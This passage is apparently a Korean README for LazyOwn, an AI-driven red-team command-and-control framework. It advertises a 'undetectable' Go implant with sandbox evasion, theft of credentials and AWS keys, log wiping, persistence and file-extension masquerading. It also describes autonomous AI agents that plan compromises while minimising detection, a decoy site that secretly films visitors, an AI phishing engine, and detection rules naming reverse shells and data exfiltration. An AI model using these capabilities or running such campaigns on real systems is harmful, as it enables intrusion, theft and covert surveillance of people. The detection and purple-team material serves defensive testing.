상세palette --info do_lazynmap전체 항목 및 graphify에서 파생된 calls와 related 이웃 (이 명령과 헬퍼 함수를 공유하는 다른 명령).
다음 단계palette --next recon킬 체인 순서에서 다음에 오는 단계의 권장 명령.

상세 뷰의 calls / related 목록은 graphify-out/graph_lazyown.json에서 가져옵니다 (graphify 스킬로 재생성됨). 해당 파일이 없으면 팔레트는 단계 데이터만으로 조용히 축소됩니다.


Telegram Hermes Bot

telegram_hermes.py 봇은 MCP 계층과 Hermes 게이트웨이를 통해 Telegram을 전체 LazyOwn 프레임워크에 연결합니다. 직접 셸 명령 실행, 자율 에이전트 위임, cron 스케줄링, C2 비컨 상호작용, 크로스 플랫폼 메시징을 지원합니다.

파일

파일용도
telegram_hermes.pyTelegram 봇 — Telegram을 LazyOwn MCP 및 Hermes 게이트웨이에 연결
run_telegram_hermes.sh전용 venv를 사용하는 런처 스크립트
venv_telegram/python-telegram-bot 의존성이 포함된 Python 가상 환경

빠른 시작```bash

1. Create the dedicated virtual environment

cd LazyOwn python3 -m venv venv_telegram source venv_telegram/bin/activate pip install python-telegram-bot nest_asyncio requests

2. Configure your bot token in payload.json

python3 -c "import json; p=json.load(open('payload.json')); p['telegram_token']='YOUR_BOTFATHER_TOKEN'; json.dump(p,open('payload.json','w'),indent=2)"

3. Launch the bot

./run_telegram_hermes.sh

root@kitploit:~
### 봇 명령어

| 명령어 | 설명 |
|---------|-------------|
| `/start <secret>` | `payload.json`의 C2 secret으로 인증 |
| `/cmd <command>` | 모든 LazyOwn 셸 명령 실행 |
| `/sitrep` | 전체 캠페인 상황 보고 |
| `/config [key] [val]` | payload.json 값 조회 또는 설정 |
| `/addcli <client_id>` | 활성 C2 클라이언트 설정 |
| `/clients` | 온라인 C2 임플란트 목록 |
| `/c2 <command>` | C2 비콘에 명령 전송 |
| `/agent <goal>` | 자율 Groq/Ollama 에이전트 실행 |
| `/delegate <goal>` | Hermes 서브에이전트에 작업 위임 |
| `/cron <schedule> <cmd>` | 반복 LazyOwn 명령 예약 |
| `/status` | 데몬 및 자율 상태 표시 |
| `/stop` | 실행 중인 자율 데몬 중지 |
| `/download <file>` | sessions/에서 파일 다운로드 |
| 문서 업로드 | C2 비콘에 파일 업로드 |

`/` 접두사가 없는 일반 텍스트 메시지는 직접 LazyOwn 명령으로 처리됩니다. 속도 제한(분당 5개 명령)과 세션 타임아웃(30분)이 적용됩니다.

### 아키텍처

봇은 MCP 서버(`skills/lazyown_mcp.py`)와 동일한 PTY 기반 명령 실행을 사용하므로, 모든 LazyOwn 명령, 별칭, 애드온이 직접적인 Python 임포트 없이 작동합니다. 자율 작업(`/agent`, `/delegate`)은 LazyOwn 셸을 통해 Groq 또는 Ollama 에이전트를 생성하고, C2 명령(`/c2`, `/clients`)은 인증된 `/api/command` 및 `/get_connected_clients` 엔드포인트를 사용합니다.

---

## 고급 AI 아키텍처 (MoE + RL + SWAN + Hive Mind)

LazyOwn은 모든 인게이지먼트를 통해 적응하고 개선되는 세계적 수준의 멀티 에이전트 AI 스택을 통합합니다:

### 전문가 혼합 (MoE) — `modules/moe_router.py`

다섯 개의 LLM 전문가가 기능 태그, 기본 가중치, 비용 등급과 함께 등록됩니다:

| 전문가 | 백엔드 | 강점 |
|--------|---------|-----------|
| `groq_fast` | Groq llama-3.1-8b-instant | 정찰, 열거, 신속한 의사 결정 |
| `groq_powerful` | Groq llama-3.3-70b-versatile | 익스플로잇, 포스트 익스플로잇, 복잡한 추론 |
| `groq_deepseek_r1` | Groq deepseek-r1-distill-llama-70b | 권한 상승, 단계별 추론 |
| `ollama_reason` | Ollama deepseek-r1:1.5b | 오프라인, 프라이버시 안전, 상세 분석 |
| `groq_gemma` | Groq gemma2-9b-it | 측면 이동, 자격 증명 분석 |

라우팅은 조정된 가중치에 대해 온도 스케일링된 소프트맥스(`T = max(0.5, 1.5/(1+calls/50))`)를 사용합니다. 가중치는 시간 경과에 따른 전문가별 보상의 지수 이동 평균을 통해 자체 조정됩니다.

### 모델로부터의 강화 학습 (RLM) — `modules/rl_trainer.py`

테이블 형식 Q-러닝은 인게이지먼트 세션에 걸쳐 라우팅 정책을 훈련합니다:```
State:  (task_type, engagement_phase, recent_reward_bucket)
Action: expert_id
Reward: r_raw - λ * detection_prob * |r_raw|    (λ=0.5)
Update: Q(s,a) ← Q(s,a) + α * [r + γ * max_a' Q(s',a') - Q(s,a)]

하이퍼파라미터: α=0.10, γ=0.90, ε_start=0.20, ε_min=0.05, ε_decay=0.995. 엡실론-그리디 탐험은 업데이트마다 감소한다. Q-값은 세션 간에 sessions/expert_qvalues.json에 유지된다.

SWAN 오케스트레이터 — skills/swan_agent.py

최상위 통합 계층은 MoE + RL + Detection Oracle + Hive Memory를 연결한다:

  • swan_run: RL 기반 라우팅과 실행 후 Q-업데이트를 포함한 단일 전문가 실행
  • swan_ensemble: ThreadPoolExecutor를 통한 N개 전문가 병렬 실행, WeightedTextAggregator로 합성
  • OutcomeEvaluator: 탐지 확률 ≥ 70%일 때 보상 = 0 (탐지 인식 보상 형성)
  • 모든 결과는 세션 간 학습을 위해 Hive Memory (ChromaDB)에 저장됨

Detection Oracle (블루 팀 미러) — modules/detection_oracle.py

17개의 Sigma-lite 규칙을 사용하여 실행 전에 탐지 확률을 예측하며, 다음을 포함한다: 자격 증명 접근 (LSASS, SAM, DCSync), 측면 이동 (PsExec, WMI, evil-winrm), 권한 상승 (토큰 가장, 명명된 파이프), 익스플로잇, 정찰, C2, 무차별 대입.

확률 집계: P(detect) = 1 - ∏(1 - P_i) 모든 트리거된 규칙에 걸쳐.

퍼플 팀 폐쇄 루프 — modules/auto_purple.py

공격적 행동을 실행하고, 탐지를 위해 LazyOwnBT를 쿼리하며, 결과를 Detection Oracle에 피드백하여 보정하는 자동화된 레드 대 블루 측정 루프.```bash (LazyOwn) > purple_exec nmap -sV 10.10.11.5 recon # execute + detect (LazyOwn) > purple_score # show detection rates (LazyOwn) > purple_report # export CSV + JSON (LazyOwn) > purple_dashboard # Textual TUI

root@kitploit:~
**탐지 방법:**

| 방법 | 검사 항목 |
|--------|----------------|
| `ai_test` | LazyOwnBT ML 모델 예측 |
| `proc_scan` | 의심스러운 프로세스 이름 |
| `net_scan` | 비정상 연결/포트 |
| `log_analyze` | 인증/syslog 이상 징후 |
| `fim_scan` | 파일 무결성 변경 |
| `redteam_hunt` | 위협 헌팅 패턴 |
| `sigma_rules` | 10개 Sigma 규칙 (mimikatz, reverse shell, privesc, nmap, webshell, /etc/shadow, cron, SMB, exfil, injection) |

**Sigma 규칙 탐지 엔진** (LazyOwnBT `lazyownbt/detection.py`):

| ID | 규칙 | 레벨 |
|----|------|-------|
| LAZYOWN-001 | Mimikatz 자격 증명 덤프 | critical |
| LAZYOWN-002 | 리버스 셸 패턴 | critical |
| LAZYOWN-003 | Sudo를 통한 권한 상승 | high |
| LAZYOWN-004 | Nmap 스캔 탐지됨 | medium |
| LAZYOWN-005 | 웹셸 실행 | critical |
| LAZYOWN-006 | 프로세스 인젝션 | high |
| LAZYOWN-007 | /etc/shadow 접근 | critical |
| LAZYOWN-008 | Cron 지속성 | high |
| LAZYOWN-009 | 측면 이동 SMB | high |
| LAZYOWN-010 | 데이터 유출 | high |

**출력 파일:**
- `sessions/purple_dataset.csv` — ML 학습 데이터셋
- `sessions/purple_audit.jsonl` — 전체 감사 로그
- `sessions/detection_feedback.jsonl` — 오라클 캘리브레이션

**참고:** 프로덕션 사용 시 auditd 로그 포워딩을 통해 실제 SIEM(Wazuh, Elastic SIEM, Splunk)과 통합하십시오. 내장 Sigma 규칙은 오프라인 테스트 전용입니다.

### Hive Mind — `skills/hive_mind.py`

공유 메모리를 갖춘 다중 에이전트 여왕+드론 아키텍처:
- **QueenBrain** (Claude): 고수준 오케스트레이션 + 고위험 작업을 위한 ConsensusProtocol
- **DronePool** (Groq/Ollama): 정찰/익스플로잇/자격 증명/측면 이동/권한 상승 작업의 병렬 실행
- **HiveMemory**: ChromaDB 시맨틱 + SQLite 에피소드 + Parquet 장기 저장소
- **EpisodeReflectionEngine**: `sessions/campaign_lessons.jsonl`로 저장되는 캠페인 후 교훈 추출

### 자율 캠페인 인텔리전스 (ACI) — `skills/aci_planner.py`

**자율적으로 계획하고, 실행하고, 학습하는 최초의 C2 프레임워크.**

ACI는 자연어 참여 목표와 완전한 자율 실행 루프 사이의 간극을 메웁니다.
경쟁 제품(Cobalt Strike, Sliver, Havoc, Metasploit) 중 이를 엔드투엔드로
수행하는 것은 없습니다:```
Operator: "Compromise the domain controller at corp.internal
           starting from a phishing foothold on 10.10.11.5"
         ↓
ACI Planner ──► MITRE ATT&CK decomposition (LLM-backed, static fallback)
                 recon → exploit → exec → privesc → cred → lateral → report
         ↓
ObjectiveStore ─► 20+ concrete objectives injected into sessions/objectives.jsonl
         ↓
auto_loop / autonomous_daemon ─► executes each objective autonomously
         ↓
ACIEngine monitors ─► detects stalled phases (blocked_count ≥ 3)
         ↓
ACIReplan ──► LLM generates alternative techniques for blocked phases
         ↓
ACIReflector ──► appends lessons to sessions/campaign_lessons.jsonl
                 feeds back into the next engagement

세 가지 MCP 도구:

도구기능
lazyown_aci_plan목표 분해 → ATT&CK 계획 → 목표 주입
lazyown_aci_status실시간 단계 분석, 완료율, 재계획 권장 사항
lazyown_aci_replan정체 시 적응형 재계획 강제 실행, 교훈 자동 생성

빠른 시작:```python

1. Submit the engagement goal

lazyown_aci_plan( goal="Compromise the DC at corp.internal", target="10.10.11.5", scope=["10.10.11.0/24"], domain="corp.internal", os_hint="windows", )

2. Start autonomous execution

lazyown_auto_loop(target="10.10.11.5", max_steps=20)

3. Monitor progress

lazyown_aci_status()

4. When blocked (blocked_count >= 3)

lazyown_aci_replan(reason="Kerberoasting blocked by AV, try AS-REP roasting")

root@kitploit:~
**ACI가 다른 도구들과 비교해 독특한 점:**

- Cobalt Strike / Sliver / Havoc은 C2 프레임워크로, 운영자가 모든 단계를 계획한다
- Metasploit은 자동화 기능은 있지만 지능이 없다
- CALDERA는 고정된 ATT&CK 절차를 에뮬레이션하지만 새로운 환경에 적응하지 못한다
- **ACI는 계획하고, 실행하고, 재계획하고, 학습한다 — 지속적으로, 여러 engagement에 걸쳐**

**지속성:**

| 파일 | 내용 |
|------|----------|
| `sessions/aci_plan.json` | 활성 계획: 단계, 목표, 완료 상태 |
| `sessions/aci_history.jsonl` | 완료되거나 중단된 계획의 아카이브 |
| `sessions/campaign_lessons.jsonl` | ACIReflector가 추출한 교훈 |

**CLI 사용법 (독립 실행):**```bash
python3 skills/aci_planner.py plan "Compromise DC" --target 10.10.11.5 --os windows
python3 skills/aci_planner.py status
python3 skills/aci_planner.py replan "technique blocked"
python3 skills/aci_planner.py reflect

자율 데몬 — skills/autonomous_daemon.py

단일 프로세스 내의 네 가지 asyncio 역할 — 단계 사이에 Claude가 필요하지 않음:``` Role 1 — ObjectiveLoop : watches objectives.jsonl, takes + executes Role 2 — ExecutionEngine : 6-layer cascade per step, RL Q-table feedback Reactive → Parquet → Bridge → SWAN(MoE+RL) → LLM → Fallback Role 3 — WorldModelWatcher : graph centrality + pivot candidate tracking Role 4 — DroneCoordinator : hive drone spawning on recon/cred/service findings

root@kitploit:~
데몬에서 SWAN 활성화: 시작하기 전에 `export AUTO_USE_SWAN=1`.

ACI가 데몬으로 공급됨: `lazyown_aci_plan`에 의해 주입된 목표는 Role 1 (ObjectiveLoop)에 의해 자동으로 픽업됩니다 — 추가 구성이 필요하지 않습니다.

### 그래프 기반 추론 — `modules/world_model.py`

NetworkGraph는 발견된 모든 관계(호스트, 서비스, 자격 증명, 신뢰 경로)를 추적하고 정규화된 차수 중심성을 계산하여 피벗 후보를 표면화합니다. 상위 3개 후보는 모든 `to_context_string()` 호출에 주입되어, 자율 루프가 항상 가장 가치 있는 측면 이동 대상을 알 수 있도록 보장합니다.

## 권한 범위 가드

`payload.json`에서 대상을 읽는 레드팀 프레임워크에는 날카로운 모서리가 있습니다: 잘못된 `rhost`가 권한 없는 호스트에 공격 명령을 실행합니다. 범위 가드는 안전망입니다. 모든 대화형 명령은 명령이 실행되기 전에 활성 대상이 승인된 교전 범위에 있는지 확인하는 단일 초크포인트를 통과합니다.```bash
(LazyOwn) > scope add 10.10.11.0/24       # CIDR, bare IP, hostname, or *.corp.local wildcard
(LazyOwn) > scope add dc.corp.local
(LazyOwn) > scope mode enforce            # off | warn (default) | enforce
(LazyOwn) > scope                         # show current scope and posture
  • 설계상 fail-open: 스코프가 비어 있거나 모드가 off인 동안에는 휴면 상태이므로, 옵트인하기 전까지 기존 캠페인은 영향을 받지 않습니다. 내부 오류가 발생하면 운영자를 차단하는 대신 명령을 허용합니다.
  • **warn**은 범위를 벗어난 공격적 명령에 주석을 달고, **enforce**는 명시적 확인이 있을 때까지 해당 명령을 차단합니다(비대화형 세션에서는 거부합니다).
  • 공격적 킬체인 카테고리만 게이트되며, 리포팅, 구성 및 로컬 헬퍼는 항상 실행됩니다. 새로운 공격적 do_* 명령은 자동으로 분류됩니다.
  • payload.json(scope, scope_enforcement)에 저장되며, 순수 로직은 셸과의 결합이 전혀 없는 cli/scope_guard.py에 있습니다.

재현 가능한 설치

의존성은 pyproject.toml에 한 번 선언되며(단일 진실 공급원), 재현 가능한 설치를 위해 고정됩니다:

  • requirements.txt — 크로스 플랫폼 코어 잠금(CUDA 휠 없음).
  • requirements-ml.txt — 선택적, 무거운 ML 스택(torch/CUDA, scikit-learn).
  • install.sh는 strict 모드로 실행되며 멱등적입니다. 기본 설치는 가벼우며, --with-ml(2GB ML 스택), --with-ollama(로컬 LLM 런타임), --with-tools(일반적인 외부 바이너리)로 추가 기능을 옵트인할 수 있습니다.
  • 개발자: pip install -e .[ml,dev].

주요 기능

  1. 741개의 공격 명령: Linux, Windows, macOS, BSD 전반에 걸친 완전한 킬체인 커버리지 — 정찰, 열거, 익스플로잇, 권한 상승, 측면 이동, 자격 증명 접근, C2, 유출, 리포팅.
  2. 대화형 cmd2 CLI: 퍼지 자동 완성, 네온 박스 구성 가능 프롬프트, 명령 팔레트(Ctrl+K), 모든 명령 후 인라인 반응형 힌트, Textual TUI 대시보드.
  3. 통합 마켓플레이스: yara_marketplace(10개의 내장 규칙: 랜섬웨어, C2, 웹셸, 난독화, 권한 상승), nuclei_marketplace(500개 이상의 템플릿), 커뮤니티 플러그인/애드온용 marketplace — 모두 curses TUI를 통해 탐색 가능.
  4. auto_pwn & hunt: 자율 익스플로잇 체이닝 및 위협 정보 기반 정찰 — auto_pwn은 킬체인 단계를 자동으로 순회하고, hunt는 알려진 TTP를 기반으로 표적 탐색을 실행합니다.
  5. 통합 명령 후 팁 엔진: ELO 평점, 배지(First Blood, Arsenal Master, Kill Chain Master), VRI 보상이 포함된 스마트 제안(킬체인 힌트, 프로팁, 호기심, 자동 제안) — 게임화된 운영자 경험.
  6. 자동 세션 암호화: auto_crypto는 종료 시 민감한 세션 파일을 암호화하고 시작 시 복호화합니다(PBKDF2HMAC + Fernet), 운영자에게 투명하게.
  7. AI 네이티브 아키텍처: MoE(Mixture of Experts) 라우터, RL 훈련, SWAN 오케스트레이터, Hive Mind 멀티 에이전트 시스템, ACI(Autonomous Campaign Intelligence) 플래너 — 자율적으로 계획하고 실행하며 학습하는 최초의 C2.
  8. 다단계 난독화 Go 임플란트: C 스텁을 사용한 2단계 XOR 인코딩 비콘 전달, AES-256 암호화 C2 채널, VM/샌드박스/디버거 회피, 다형성, LOLBAS 기반 스테이저. Kernel 6.12 및 Windows 10.0.20348에서 테스트됨.
  9. Linux BOF(Beacon Object Files): ELF dlopen 런타임을 통해 Linux용 BOF 지원을 제공하는 최초의 오픈소스 C2 프레임워크. Windows BOF 계약과 소스 호환되는 datap API. 직접 시스템 콜 및 io_uring 지원.
  10. 미끼 블루팀 트랩: Flask 미끼 웹사이트가 무단 방문자(C2를 탐색하는 블루팀 운영자)의 비디오/오디오를 녹화하고 이미지를 캡처하여 sessions/captured_images에 저장합니다.
  11. Bloodhound 공격 표면: Bloodhound ZIP 데이터를 업로드하여 필터링 및 검색 기능이 있는 대화형 공격 표면 그래프를 렌더링하며, lazynmap 탐색 데이터로 보강됩니다.
  12. AI 기반 피싱 엔진: Groq/DeepSeek AI 생성 이메일 템플릿, 동적 URL 생성, 추적 픽셀, URL 단축, 테스트 엔드포인트 생성.

  1. 미끼: IP 주소가 127.0.0.1 또는 lhost와 일치하지 않으면 Flask가 미끼 웹사이트를 표시합니다. 이 미끼 사이트는 침입자의 비디오를 오디오와 함께 녹화하고 사진을 촬영합니다(sessions/captured_images). 블루팀 운영자가 누구인지 파악하기 위한 storm breaker의 소형 버전과 같습니다.

image

  1. 적대자 시뮬레이션: 레드팀 작전 세션을 생성하기 위한 고급 기능으로, 세밀하고 효과적인 시뮬레이션을 보장합니다.

adversay emulator

  1. 작업 스케줄링: cron 명령을 활용하여 작업을 예약하고 자동화함으로써 지속적인 위협 시뮬레이션을 가능하게 합니다.
  2. 실시간 결과: 보안 평가로부터 즉각적인 피드백과 결과를 얻어 시기적절하고 정확한 통찰력을 보장합니다.
  3. RAT 및 봇넷 기능: 원격 접근 및 제어 기능을 포함하여 봇넷과 지속적 위협을 관리할 수 있습니다.
  4. AI 기반 C2 프레임워크: 명령 및 제어(C2) 프레임워크로서 은밀한 통신과 침해된 시스템에 대한 제어를 가능하게 합니다. 또한 opsec을 개선하기 위한 다수의 AI 봇이 있습니다. Flask로 개발되어 원활한 상호 작용을 위한 사용자 친화적 인터페이스를 제공합니다. 이제 네트워크 탐색 기능을 갖추어 필터와 검색 패널을 통해 클라이언트 맵에서 공격 표면을 명확하고 직관적으로 볼 수 있습니다. 새로운 기능이 곧 제공될 예정입니다. image

vulnbot

  • C2 LazyAddon Creator: C2 대시보드의 안내식 /addons 페이지에서 YAML을 직접 다루지 않고 lazyaddons/*.yaml 통합을 작성할 수 있습니다. 하나의 양식이 모든 애드온 옵션(이름, 설명, 작성자, 버전, 활성화 여부, 대상 OS, 트리거 서비스, 카테고리, 모듈 유형, 설치 유형, 매개변수, 도구 블록, C2 추가 항목, 환경 변수)을 툴팁, 플레이스홀더, 필드별 도움말과 함께 노출합니다. 플레이스홀더 칩({rhost}, {url}, 선언된 매개변수, 모든 payload.json 키)은 명령 상자로 드래그 앤 드롭할 수 있습니다. 서버 측 검증은 파일이 작성되기 전에 안전하지 않은 이름, 경로 순회, 알 수 없는 플레이스홀더, 잘못된 형식의 URL을 거부합니다. 쓰기는 원자적이고 안전합니다(mkstemp + fchmod를 통해 제한적 권한으로 임시 파일을 생성하고, 플러시 및 fsync한 후 os.replace로 승격). 목록 및 YAML 미리보기 페이지가 라이프사이클을 완성합니다. 모든 변경 라우트는 CSRF로 보호됩니다. 계약: lazyc2/addon_creator.py + lazyc2/blueprints/addons.py, tests/test_addon_creator.py 및 tests/run_mutation_addon_creator.py 뮤테이션 게이트로 커버됩니다.
  1. 탐지 불가, 난독화, 가변형 GO 임플란트: 페이로드가 포함된 명령은 기본적으로 난독화되어 제공됩니다. 비콘을 직접 다운로드하는 대신, 키로 XOR 인코딩된 비콘을 다운로드하기 위해 C로 작성된 스텁을 다운로드합니다. 그런 다음 메모리에서 디코딩되어 탐지를 회피하기 위해 고유한 이름의 임시 경로에서 실행되며, Windows에서는 svchost를, Linux에서는 lazyservice를 사용합니다. 이는 2단계 임플란트를 수행하며, Kernel 6.12 및 Windows [Version 10.0.20348.3807]에서 테스트되었습니다. 또한 LOLBAS PS1 및 Csharp를 사용하는 대체 Windows 스텁과 동일한 기술을 사용하는 LOLBAS의 ebird3 버전이 추가되었습니다. Go 비콘은 고급 레드팀 작전에 맞춰진 멀티 플랫폼, 탐지 불가, 고도로 난독화된 임플란트입니다. 다형성을 특징으로 하며 구성 가능한 스텔스 모드에서 작동하고 AES-256 암호화 채널로 통신을 보호합니다. 비콘은 합법적인 네트워크 트래픽을 시뮬레이션하여 환경에 녹아들고, 가상 머신, 샌드박스, 컨테이너, 디버거를 식별하여 탐지를 회피하며 동적으로 동작을 조정합니다. 최소한의 풋프린트로 핑 기반 호스트 열거 및 구성된 대상의 포트 스캔을 통해 강력한 네트워크 탐색을 지원합니다. 이 임플란트는 개인 키, AWS 자격 증명, 브라우저 자격 증명, 시스템 로그를 포함한 민감한 데이터 유출에 탁월합니다. 트래픽 리다이렉션을 위한 동적 TCP 프록싱, 권한 상승 시도, 시스템 로그 정리를 제공합니다. 지속성은 예약된 작업, systemd, crontab, LaunchAgents를 통해 Windows, Linux, macOS 전반에 걸쳐 달성됩니다. 추가 기능으로는 적대자 에뮬레이션(MITRE ATT&CK), 파일 타임스탬프 난독화, 유출을 위한 디렉터리 압축이 있습니다. 코드 건강성을 위해 Go vet으로 빌드된 이 임플란트는 Dockerized 환경 및 AWS Firecracker 마이크로VM과 원활하게 통합되어 현대 레드팀 인프라의 초석이 됩니다. 코드 무결성을 위해 Go vet으로 빌드된 이 임플란트는 트래픽 난독화를 위해 Cloudflare를 활용하여 안전하고 고성능인 리다이렉터를 통해 통신을 라우팅함으로써 C2 인프라를 은닉합니다. Go 바이너리는 Garble 난독화로 강화되어 리버스 엔지니어링과 시그니처 기반 탐지를 좌절시킵니다. Windows에서 이 임플란트는 확장자 위장을 사용하여 정상 파일(예: .pdfx)로 가장하고 rsrc를 통해 사용자 정의 아이콘을 삽입하여 설득력 있는 사회 공학을 가능하게 합니다.

image

사용 가능한 비콘 명령:

  • stealth_off 스텔스 해제, 스텔스 모드를 비활성화하여 정상 작동을 허용합니다.
  • stealth_on 닌자 모드 진입, 스텔스 모드를 활성화하여 탐지를 피하기 위해 활동을 최소화합니다.
  • download: download:[filename] C2에서 침해된 호스트로 파일을 다운로드합니다.
  • upload: [filename]: 침해된 호스트에서 C2로 파일을 업로드합니다.
  • rev: 구성된 포트를 사용하여 C2로 리버스 셸을 설정합니다.
  • exfil: 민감한 데이터(예: SSH 키, AWS 자격 증명, 명령 기록)를 유출합니다.
  • download_exec: download_exec:[url]: URL에서 바이너리를 다운로드하고 실행합니다(Linux 전용, /dev/shm에 저장).
  • obfuscate: [filename]: 포렌식 분석을 방해하기 위해 파일 타임스탬프를 난독화합니다.
  • cleanlogs: 시스템 로그를 지웁니다(예: Linux의 /var/log/syslog, Windows의 이벤트 로그).
  • discover: 네트워크 탐색을 수행하여 핑을 통해 활성 호스트를 식별합니다.
  • adversary:[id_atomic]: 다운로드한 atomic redteam 프레임워크 스크립트를 사용하여 적대자 에뮬레이션 테스트(MITRE ATT&CK)를 실행합니다.
  • softenum: 호스트에서 유용한 소프트웨어(예: docker, nc, python)를 열거합니다.
  • netconfig: 네트워크 구성을 캡처하고 유출합니다(예: Windows의 ipconfig, Linux의 ifconfig).
  • escalatelin: Linux에서 권한 상승을 시도합니다(예: sudo -n 또는 SUID 바이너리를 통해).
  • proxy:[listenip]:[listenport]:[targetip]:[targetport] listenAddr에서 targetAddr로 트래픽을 리다이렉션하는 TCP 프록시를 시작합니다.
  • stop_proxy:[listenaddr] 지정된 주소에서 TCP 프록시를 중지합니다.
  • portscan: 발견된 호스트 및 구성된 rhost의 포트를 스캔합니다.
  • compressdir:[directory]: 디렉터리를 .tar.gz 파일로 압축하고 유출합니다.
  • sandbox: 시스템이 샌드박스인지 여부에 대한 정보를 가져옵니다.
  • isvm: 시스템이 가상 머신인지 여부에 대한 정보를 가져옵니다.
  • debug: 대상이 디버깅되고 있는지 여부에 대한 정보를 가져옵니다.
  • persist: 대상 시스템에서 지속성 메커니즘을 시도합니다.

v0.2.161 하이라이트

통합 킬체인(단일 진실 공급원)

  • modules/killchain.py가 단계를 계산하며, 모든 표면(CLI /killchain, /api/killchain, C2 /api/data+/api/dashboard, GUI2 패널)이 해당 snapshot()을 렌더링합니다.
  • 임플란트별 비콘 명령 기록: /api/beacon_results/<client_id>, modules/beacon_history.py(JSONL, 경로 안전)로 지원됩니다.
  • CLI /killchain auto on|off|N 실시간 자동 새로 고침; 플래그 killchain_auto_every / killchain_auto_on_phase_change.
  • C2는 부팅 시 세션 상태를 복호화하고 정상 종료 시 다시 암호화하므로, 서버가 실행되는 동안 비콘과 킬체인이 실제 값을 반영합니다.

마켓플레이스(YARA + Nuclei)

통합 마켓플레이스 TUI에서 탐색, 검색, 설치:

  • yara_marketplace list|search|install|info -- 10개의 내장 규칙(랜섬웨어, C2, 웹셸, 난독화, 권한 상승)
  • nuclei_marketplace list|search|install|info -- ~/nuclei-templates의 500개 이상 템플릿
  • marketplace list|search|install|update -- 137개의 YAML 애드온, 57개의 플러그인, 69개의 도구

auto_pwn & hunt

  • auto_pwn -- 정찰부터 익스플로잇까지 자율 킬체인 순회
  • hunt -- 위협 정보 기반 정찰: 알려진 TTP를 발견된 서비스에 매핑

반응형 인텔리전스

  • 명령 후 팁 엔진: 킬체인 힌트, 프로팁, 호기심 보상
  • ELO 평점, 배지(First Blood, Arsenal Master, Kill Chain Master)
  • 인라인 반응형 힌트: 모든 작업 후 "다음 명령" 제안

Auto Crypto

PBKDF2HMAC + Fernet을 통한 종료 시 투명한 세션 암호화 / 시작 시 복호화.

새로운 플레이북

7개의 APT 프로필: Azure Graph API, CICD Poisoning, Entra Connect, macOS TCC, OAuth Token Theft, SCCM/MECM, VDI Breakout.

대화형 체인 모드

chainmode on은 월드 모델 기반 체이닝 흐름을 시작합니다: 모든 명령 후 셸이 순위가 매겨진 다음 단계를 제안합니다(Enter = 최상위 제안, 1..N = 순위 대안, 임의 명령 = 재정의, skip = 수동, ESC/Ctrl+C/off = 나가기). 잘못된 선택은 조용히 건너뛰는 대신 다시 프롬프트하며, 흐름은 max_steps개의 체인된 명령 후 자동으로 일시 중지됩니다. 상태는 sessions/chain_mode.json에 유지됩니다(원자적 쓰기). 계약: cli/chain_mode.py + cli/command_chain.py.

기능 다듬기(UX + 보안 강화)

  • 증거 기반 인라인 힌트: 모든 제안은 동사, 신뢰도([0, 99], 결코 부정직한 100%가 아님), 이유, 출처를 포함합니다. 계약: cli/reactive_hints.py + cli/recommendation_signals.py.
  • 전적으로 rich를 통해 렌더링되는 통합 팁 엔진(원시 ANSI 이스케이프 없음); 레지스트리 팁 텍스트는 마크업 렌더링을 절대 깨뜨릴 수 없습니다. 계약: cli/tips_engine.py.
  • cli/noise_verbs.py는 힌트, 팁, 체인 모드가 공유하는 비실행 동사 목록의 단일 진실 공급원입니다.
  • 테넌트 바인딩 API 키: core/api_authz.py는 이제 문서화된 로테이션 유예 기간을 구현하고, 로테이션된 키에서 권한을 복사하며(회귀 수정됨), JSON 401/403을 반환하고(TRAP_HTTP_EXCEPTIONS와 안전), C2 /api/health/tenant 엔드포인트가 실제로 적용됩니다. 뮤테이션 게이트: tests/run_mutation_api_authz.py(7/7 killed).
  • core/logging.py의 install_json_handler는 기존 핸들러를 보존하며 멱등적입니다.
  • 구조화된 ELO 동기화는 리다이렉션된 사용자 저장소 경로를 존중하며 테스트는 호스트 로그인에 독립적입니다.

보안 강화(SDD+TDD+BDD)

core/hardening.py에 중앙 집중식 보안 프리미티브와 48개의 BDD 스타일 테스트(tests/test_security_hardening_v3.py)가 있습니다. 실행 방법:```bash pytest tests/test_security_hardening.py tests/test_security_hardening_v2.py tests/test_security_hardening_v3.py -v mutmut run # 122/228 killed, 53.5% kill rate on core/hardening.py

root@kitploit:~
**적용된 주요 수정 사항:**
- `anti_forensics.py`, `pivoting.py`, `icmp_server.py`, `resource_script.py`, `command_executor.py`, `postexp_migrated.py`에서 `shell=True` 제거 (22개 인스턴스)
- `persist_migrated.py`, `cloud.py`, `lazyown.py` (4개 인스턴스), `misc_migrated.py`에서 `os.system()` 제거
- `websocket_beacon.py`, `evasive_payload.py`에서 `os.popen()` 제거
- 4개 파일(C2, lateral, exfil, persist)에서 `sshpass -p`를 `sshpass -e` + 환경 변수로 교체
- `phishing_orchestrator.py`에서 하드코딩된 암호화 키 제거 (ENCRYPTION_KEY 필수)
- C2 배너의 XSS를 `html.escape()`로 수정
- 클립보드의 rhost를 통한 명령 주입을 `safe_clipboard_copy()`로 수정
- cmd2 `CMD_ATTR_HELP_CATEGORY`를 `COMMAND_ATTR_HELP_CATEGORY`로 이름 변경 (cmd2 4.2.2 호환)

---

## 명령 기능

LazyOwn은 13개 킬체인 단계에 걸쳐 741개의 명령을 제공하며, CLI와 웹 C2 대시보드 모두에서 사용할 수 있습니다:

| 단계 | 주요 명령 |
|-------|-------------------|
| 정찰 | `lazynmap`, `ping`, `whatweb`, `gobuster`, `ffuf`, `dig`, `dnsenum`, `finalrecon` |
| 열거 | `enum4linux`, `cme`, `bloodhound`, `nuclei`, `kerbrute`, `ldapdomaindump` |
| 익스플로잇 | `auto_pwn`, `hunt`, `ss` (searchsploit), `venom`, `lazymsfvenom`, `searchhash` |
| 포스트 익스플로잇 | `linpeas`, `winpeas`, `blacksandbeacon`, `mimikatzpy`, `disableav` |
| 지속성 | `persist`, `backdoor`, `cron`, `schtask`, `createwebshell` |
| 권한 상승 | `getcap`, `sudo`, `adcs_check`, `privesc_predictor` |
| 자격 증명 접근 | `secretsdump`, `evil`, `getnpusers`, `hashcat`, `john`, `spraykatz` |
| 측면 이동 | `psexec`, `wmiexec`, `ssh_cmd`, `chisel`, `ligolo`, `bloodhound` |
| 유출 | `exfil`, `upload_gofile`, `encrypt`/`decrypt`, `compressdir` |
| C2 | `lazyc2`, `blacksandbeacon`, `createrevshell`, `listener_go` |
| 보고 | `report`, `lazyreport`, `campaign_sitrep`, `timeline`, `dashboard` |
| AI/에이전트 | `auto_loop`, `recommend_next`, `playbook_generate`, `playbook_run`, `orchestrate` |
| 마켓플레이스 | `yara_marketplace`, `nuclei_marketplace`, `marketplace`, `lab` |

